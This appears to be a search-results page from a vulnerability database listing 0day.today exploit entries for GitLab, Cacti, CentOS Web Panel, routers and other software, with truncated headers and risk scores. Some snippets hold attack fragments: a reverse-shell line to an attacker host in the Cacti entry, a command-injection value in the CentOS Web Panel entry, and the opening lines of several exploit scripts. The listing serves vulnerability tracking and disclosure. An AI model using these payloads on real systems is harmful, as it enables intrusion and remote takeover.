39001 matches found

0day.today
added 2023/04/02 12:0 a.m., 260 views

GitLab v15.3 - Remote Code Execution (Authenticated) Exploit

Exploit Title: GitLab v15.3 - Remote Code Execution RCE Authenticated Exploit Author: Antonio Francesco Sardella Vendor Homepage: https://about.gitlab.com/ Software Link: https://about.gitlab.com/install/ Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to...

CVSS: 9.9, AI score: 9.2, EPSS: 0.75718
Exploits: 4

0day.today
added 2023/04/02 12:0 a.m., 289 views

XCMS v1.83 - Remote Command Execution Exploit

Exploit Title: XCMS v1.83 - Remote Command Execution RCE Author: Onurcan Email: email protected Site: ihteam.net Script Download : http://www.xcms.it Date: 26/12/2022 The xcms's footer that is in "/dati/generali/footer.dtb" is included in each page of the xcms. Taking "home.php" for example: So th...

AI score: 6.8
Exploits: 0

0day.today
added 2023/04/02 12:0 a.m., 153 views

AimOne Video Converter V2.04 Build 103 - Buffer Overflow Exploit

Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow DoS Author: nu11secur1ty Vendor: https://aimone-video-converter.software.informer.com/, http://www.aimonesoft.com/ Software: https://aimone-video-converter.software.informer.com/download/?ca85d0 Reference: Description: The AimOne Vid...

AI score: 7.4
Exploits: 0

0day.today
added 2023/04/02 12:0 a.m., 196 views

Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected XSS Vulnerabilities

Exploit Title: Yahoo User Interface library YUI2 TreeView v2.8.2 - Multiple Reflected Cross Site Scripting XSS Exploit Author: Rian Saaty Vendor Homepage: https://yui.github.io/yui2/ Software Link: https://yui.github.io/yui2/ Version: 2.8.2 Tested on: MacOS, WindowsOS, LinuxOS CVE : CVE-2022-4819...

CVSS: 6.1, AI score: 6.4, EPSS: 0.06608
Exploits: 3

0day.today
added 2023/04/02 12:0 a.m., 229 views

Reprise Software RLM v14.2BL4 - Cross-Site Scripting Vulnerability

Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting XSS Exploit Author: Mohammed A.Siledar Author Company : reprisesoftware Version: rlm.v14.2BL4 Vendor home page : https://reprisesoftware.com Software Link:...

CVSS: 6.1, AI score: 6.4, EPSS: 0.02527
Exploits: 4

0day.today
added 2023/04/02 12:0 a.m., 191 views

Prizm Content Connect v10.5.1030.8315 - XXE Vulnerability

Exploit Title: Prizm Content Connect v10.5.1030.8315 - XXE Exploit Author: @xhzeem Vendor Homepage: https://help.accusoft.com/PCC/v9.0/HTML/About%20Prizm%20Content%20Connect.html Version: v10.5.1030.8315 The Prizm Content Connect v10.5.1030.8315 is vulnerable to XXE Proof Of Concept:...

AI score: 6.8
Exploits: 0

0day.today
added 2023/04/02 12:0 a.m., 223 views

Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution Vulnerability

Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution RCE + Centos Web Panel 7 - 0.9.8.1147 + Affected Component ip:2031/login/index.php?login=$whoami + Discoverer: Numan Türle @ Gais Cyber Security + Author: Numan Türle + Vendor: https://centos-webpanel.com/ -...

CVSS: 9.8, AI score: 9.4, EPSS: 0.99989
Exploits: 12

0day.today
added 2023/04/02 12:0 a.m., 503 views

AD Manager Plus 7122 - Remote Code Execution Vulnerability

Exploit Title: AD Manager Plus 7122 - Remote Code Execution RCE Exploit Author: Chan Nyein Wai & Thura Moe Myint Vendor Homepage: https://www.manageengine.com/products/ad-manager/ Software Link: https://www.manageengine.com/products/ad-manager/download.html Version: Ad Manager Plus Before 7122...

CVSS: 10, AI score: 9.3, EPSS: 0.99999
Exploits: 347

0day.today
added 2023/04/02 12:0 a.m., 190 views

perfSONAR v4.4.5 - Partial Blind CSRF Vulnerability

Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF Link: https://github.com/perfsonar/ Affected Versions: v4.x = v4.4.5 Vulnerability Type: Partial Blind CSRF Discovered by: Ryan Moore CVE: CVE-2022-41413 Summary A partial blind CSRF vulnerability exists in perfSONAR v4.x = v4.4.5 within the...

CVSS: 4.3, AI score: 5.1, EPSS: 0.01991
Exploits: 4

0day.today
added 2023/04/02 12:0 a.m., 165 views

Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (Authenticated) Exploit

Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution RCE Authenticated Exploit Author: Yerodin Richards Vendor Homepage: https://www.nexxtsolutions.com/ Version: 42.103.1.5095 Tested on: ARN02304U8 CVE : CVE-2022-44149 import requests import base64 routerhost =...

CVSS: 8.8, AI score: 8.8, EPSS: 0.64354
Exploits: 5

0day.today
added 2023/04/02 12:0 a.m., 216 views

Enlightenment v0.25.3 - Privilege escalation Vulnerability

Exploit Title: Enlightenment v0.25.3 - Privilege escalation Author: nu11secur1ty Vendor: https://www.enlightenment.org/ Software: https://www.enlightenment.org/download Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706 CVE ID: CVE-2022-37706 Description: The...

CVSS: 7.8, AI score: 7.6, EPSS: 0.05486
Exploits: 15

0day.today
added 2023/04/02 12:0 a.m., 5305 views

Apache 2.4.x - Buffer Overflow Exploit

Exploit Title: Apache 2.4.x - Buffer Overflow Exploit Author: Sunil Iyengar Vendor Homepage: https://httpd.apache.org/ Software Link: https://archive.apache.org/dist/httpd/ Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51 Tested on: Server Kali, Client MacOS Monterey CVE :...

CVSS: 9.8, AI score: 9.6, EPSS: 0.97108
Exploits: 4

0day.today
added 2023/04/02 12:0 a.m., 184 views

NetIQ Performance Endpoint v5.1 - remote root/SYSTEM Exploit

/ Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit Date: Jun 2007 Exploit Author: mu-b Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management Version: All Tested on: Windows / Solaris x86/SPARC CVE : 0day endpoint-pown-uni.c...

AI score: 7.4
Exploits: 0

0day.today
added 2023/04/02 12:0 a.m., 188 views

TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (Authenticated) Exploit

!/usr/bin/python3 Exploit Title: TP-Link TL-WR902AC firmware 210730 V3 - Remote Code Execution RCE Authenticated Exploit Author: Tobias Müller Date: 2022-12-01 Version: TL-WR902ACEUV30.9.1 Build 220329 Vendor Homepage: https://www.tp-link.com/ Tested On: TP-Link TL-WR902AC Vulnerability...

CVSS: 8.8, AI score: 8.9, EPSS: 0.33482
Exploits: 5

0day.today
added 2023/04/02 12:0 a.m., 190 views

Splashtop 8.71.12001.0 - Unquoted Service Path Vulnerability

Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path Exploit Author: A.I. hernandez Version: 8.71.12001.0 Vendor Homepage: https://www.splashtop.com Version: current version Tested on: Windows 10 21H2 Step to discover Unquoted Service Path: C:\wmic service get...

AI score: 7.4
Exploits: 0

0day.today
added 2023/04/01 12:0 a.m., 179 views

GeoVision Camera GV-ADR2701 - Authentication Bypass Vulnerability

Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass Device name: GV-ADR2701 Exploit Author: Chan Nyein Wai Vendor Homepage: https://www.geovision.com.tw/ Software Link: https://www.geovision.com.tw/download/product/ Firmware Version: V1.0020171215 Tested on: windows 10 Exploitation...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 309 views

WooCommerce v7.1.0 - Remote Code Execution Vulnerability

Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution RCE Author: Milad Karimi Vendor Homepage: https://wordpress.org/plugins/woocommerce Software Link: https://wordpress.org/plugins/woocommerce Tested on: windows 10 , firefox Version: 7.1.0 CVE : N/A Description: simple, easy to use...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 198 views

EQ Enterprise management system v2.2.0 - SQL Injection Vulnerability

Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection Exploit Author: TLF Vendor Homepage: https://www.yiquantech.com/pc/about.html Software Link (download link for the affected application):...

CVSS: 9.8, AI score: 9.4, EPSS: 0.02798
Exploits: 4

0day.today
added 2023/03/31 12:0 a.m., 142 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution RCE Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 194 views

qubes-mirage-firewall v0.8.3 - Denial Of Service Exploit

Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service DoS Exploit Author: Krzysztof Burghardt Vendor Homepage: https://mirage.io/blog/MSA03 Software Link: https://github.com/mirage/qubes-mirage-firewall/releases Version: = 0.8.0 & 0.8.4 Tested on: Qubes OS CVE: CVE-2022-46770 PoC exploi...

CVSS: 7.5, AI score: 7.6, EPSS: 0.21478
Exploits: 6

0day.today
added 2023/03/31 12:0 a.m., 145 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service DoS Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Version 1:...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 250 views

Bludit 3-14-1 Plugin (UploadPlugin) - Remote Code Execution (Authenticated) Vulnerability

Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution RCE Authenticated Exploit Author: Alperen Ergel Contact: @alpernae IG/TW Software Homepage: https://www.bludit.com/ Version : 3-14-1 Tested on: windows 11 wampserver | Kali linux Category: WebApp Google Dork: intext:'2022...

AI score: 7.1
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 158 views

ASKEY RTF3505VW-N1 - Privilege Escalation Exploit

Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation Exploit Author: Leonardo Nicolas Servalli Vendor Homepage: www.askey.com Platform: ASKEY router devices RTF3505VW-N1 Tested on: Firmware BRSVg000R3505VMN1001s327 Vulnerability analysis:...

AI score: 7.4
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 144 views

Bangresto 1.0 - SQL Injection Vulnerability

Exploit Title: Bangresto 1.0 - SQL Injection Exploit Author: nu11secur1ty Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html Demo: https://axcora.my.id/bangrestoapp/start.php Software: https://github.com/mesinkasir/bangresto Reference:...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 156 views

Textpattern 4.8.8 - Remote Code Execution (Authenticated) Vulnerability

Exploit Title: Textpattern 4.8.8 - Remote Code Execution RCE Authenticated Exploit Author: Alperen Ergel Contact: @alpernae IG/TW Software Homepage: https://textpattern.com/ Version : 4.8.8 Tested on: windows 11 xammp | Kali linux Category: WebApp Google Dork: intext:"Published with Textpattern...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 149 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Versi...

AI score: 7.4
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 264 views

Cacti v1.2.22 - Remote Command Execution Exploit

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

CVSS: 9.8, AI score: 9.4, EPSS: 0.99826
Exploits: 48

0day.today
added 2023/03/31 12:0 a.m., 193 views

rconfig 3.9.7 - Sql Injection (Authenticated) Exploit

Exploit Title: rconfig 3.9.7 - Sql Injection Authenticated Exploit Author: azhen Vendor Homepage: https://www.rconfig.com/ Software Link: https://www.rconfig.com/ Vendor: rConfig Version: " sys.exit1 host=sys.argv1 Enter the hostname def getdatahost: print"+ Get db data..." vulurl =...

CVSS: 8.8, AI score: 8.8, EPSS: 0.02685
Exploits: 4

0day.today
added 2023/03/31 12:0 a.m., 142 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 152 views

SOUND4 Server Service 4.1.102 - Local Privilege Escalation Vulnerability

Exploit Title: SOUND4 Server Service 4.1.102 - Local Privilege Escalation Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: 4.1.102 Summary: SOUND4 Windows Server Service. Desc: The application suffers from an unquot...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 155 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15...

AI score: 7.4
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 165 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass IDOR Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Versio...

AI score: 7.4
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 149 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Version 1:...

AI score: 7.4
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 139 views

Judging Management System v1.0 - Remote Code Execution Exploit

Exploit Title: Judging Management System v1.0 - Remote Code Execution RCE Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html Version: 1.0...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 171 views

CoolerMaster MasterPlus 1.8.5 - (MPService) Unquoted Service Path Vulnerability

Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path Exploit Author: Damian Semon Jr Blue Team Alpha Version: 1.8.5 Vendor Homepage: https://masterplus.coolermaster.com/ Software Link: https://masterplus.coolermaster.com/ Tested on: Windows 10 64x Step to discover the...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m., 136 views

Judging Management System v1.0 - Authentication Bypass Vulnerability

Exploit Title: Judging Management System v1.0 - Authentication Bypass Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html Version: 1.0 Teste...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/30 12:0 a.m., 291 views

LISTSERV 17 - Reflected Cross Site Scripting Vulnerability

Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting XSS Google Dork: inurl:/scripts/wa.exe Exploit Author: Shaunt Der-Grigorian Vendor Homepage: https://www.lsoft.com/ Software Link: https://www.lsoft.com/download/listserv.asp Version: 17 Tested on: Windows Server 2019 CVE : CVE-2022-3919...

CVSS: 6.1, AI score: 6.4, EPSS: 0.06314
Exploits: 4

0day.today
added 2023/03/30 12:0 a.m., 376 views

Concrete5 CME v9.1.3 - Xpath injection Vulnerability

Exploit Title: Concrete5 CME v9.1.3 - Xpath injection Author: nu11secur1ty Vendor: https://www.concretecms.org/ Software: https://www.concretecms.org/download Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3 Description: The URL...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/30 12:0 a.m., 258 views

Ancillary Function Driver (AFD) For Winsock Privilege Escalation Exploit

A vulnerability exists in the Windows Ancillary Function Driver for Winsock (afd.sys) that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. Due to a flaw in AfdNotifyRemoveIoCompletion, it is possible to create an arbitrary kernel Write-Where primitive, which can b...

CVSS: 7.8, AI score: 7.5, EPSS: 0.65417
Exploits: 13

0day.today
added 2023/03/30 12:0 a.m., 277 views

Lavasoft web companion 4.1.0.409 - (DCIservice) Unquoted Service Path Vulnerability

Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path Author: P4p4 M4n3 Vendor Homepage: https://webcompanion.com/en/ Version 4.1.0.409 Tested on: Microsoft Windows Server 2019 Datacenter x64 Description: Lavasoft 4.1.0.409 install DCIservice as a service with an...

AI score: 7.4
Exploits: 0

0day.today
added 2023/03/30 12:0 a.m., 339 views

Ecommerse v1.0 - Cross-Site Scripting (XSS) Vulnerability

Title: Ecommerse v1.0 - Cross-Site Scripting XSS Author: nu11secur1ty Vendor: https://github.com/winston-dsouza Software: https://github.com/winston-dsouza/ecommerce-website Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website Description:...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/30 12:0 a.m., 373 views

4images 1.9 - Remote Command Execution Vulnerability

Exploit Title: 4images 1.9 - Remote Command Execution RCE Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.9 Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" - " Edit Templates" - "Selec...

AI score: 7.1
Exploits: 0

0day.today
added 2023/03/30 12:0 a.m., 269 views

ZTE-H108NS Router - Authentication Bypass Vulnerability

Exploit Title: Router ZTE-H108NS - Authentication Bypass Exploit Author: George Tsimpidas Vendor: https://www.zte.com.cn/global/ Firmware: H108NSV1.0.7uZRDGR2A68 CVE: N/A Tested on: Debian 5.18.5 Description : When specific http methods are listed within a security constraint, then only those...

AI score: 7.4
Exploits: 0

0day.today
added 2023/03/30 12:0 a.m., 236 views

Eve-ng 5.0.1-13 - Stored Cross-Site Scripting Vulnerability

Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting XSS Exploit Author: @casp3r0x0 hassan ali al-khafaji Vendor Homepage: https://www.eve-ng.net/ Software Link: https://www.eve-ng.net/index.php/download/ Version: Free EVE Community Edition Version 5.0.1-13 Tested on: Free EVE Community...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/30 12:0 a.m., 275 views

ZTE-H108NS Router - Stack Buffer Overflow Exploit

Exploit Title: ZTE-H108NS - Stack Buffer Overflow DoS Exploit Author: George Tsimpidas Vendor: https://www.zte.com.cn/global/ Firmware: H108NSV1.0.7uZRDGR2A68 Usage: python zte-exploit.py CVE: N/A Tested on: Debian 5.18.5 !/usr/bin/python3 import sys import socket from time import sleep host =...

AI score: 7.4
Exploits: 0

0day.today
added 2023/03/30 12:0 a.m., 680 views

CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Vulnerability

Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi Deda Cloud Cybersecurity Team Vendor Homepage: https://www.crowdstrike.com/ Author Homepage:...

CVSS: 2.7, AI score: 3.6, EPSS: 0.03672
Exploits: 5

0day.today
added 2023/03/30 12:0 a.m., 252 views

Zillya Total Security 3.0.2367.0 - Local Privilege Escalation Vulnerability

Exploit Title: Zillya Total Security 3.0.2367.0 - Local Privilege Escalation Author: M. Akil Gündoğan Contact: https://twitter.com/akilgundogan Vendor Homepage: https://zillya.com/ Software Link: https://download.zillya.com/ZTS3.exe / https://download.zillya.com/ZIS3.exe Version: IS 3.0.2367.0 / ...

AI score: 6.8
Exploits: 0

0day.today
added 2023/03/30 12:0 a.m., 300 views

Dreamer CMS v4.0.0 - SQL Injection Vulnerability

Exploit Title: Dreamer CMS v4.0.0 - SQL Injection Exploit Author: lvren Vendor Homepage: http://cms.iteachyou.cc/ Software Link: https://gitee.com/isoftforce/dreamercms/repository/archive/v4.0.0.zip Version: v4.0.0 CVE: CVE-2022-43128 Proof Of Concept: POST /admin/search/doSearch HTTP/1.1 Host:...

AI score: 6.3
Exploits: 3

0day.today
added 2023/03/30 12:0 a.m., 521 views

LISTSERV 17 - Insecure Direct Object Reference (IDOR) Vulnerability

Exploit Title: LISTSERV 17 - Insecure Direct Object Reference IDOR Google Dork: inurl:/scripts/wa.exe Exploit Author: Shaunt Der-Grigorian Vendor Homepage: https://www.lsoft.com/ Software Link: https://www.lsoft.com/download/listserv.asp Version: 17 Tested on: Windows Server 2019 CVE :...

CVSS: 7.5, AI score: 7.6, EPSS: 0.07195
Exploits: 4

0day.today
added 2023/03/30 12:0 a.m., 225 views

Shoplazza 1.1 - Stored Cross-Site Scripting Vulnerability

Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting XSS Exploit Author: Andrey Stoykov Software Link: https://github.com/Shoplazza/LifeStyle Version: 1.1 Tested on: Ubuntu 20.04 Stored XSS 1: To reproduce do the following: 1. Login as normal user account 2. Browse "Blog Posts" - "Manage...

AI score: 6.8
Exploits: 0

Total number of security vulnerabilities: 39001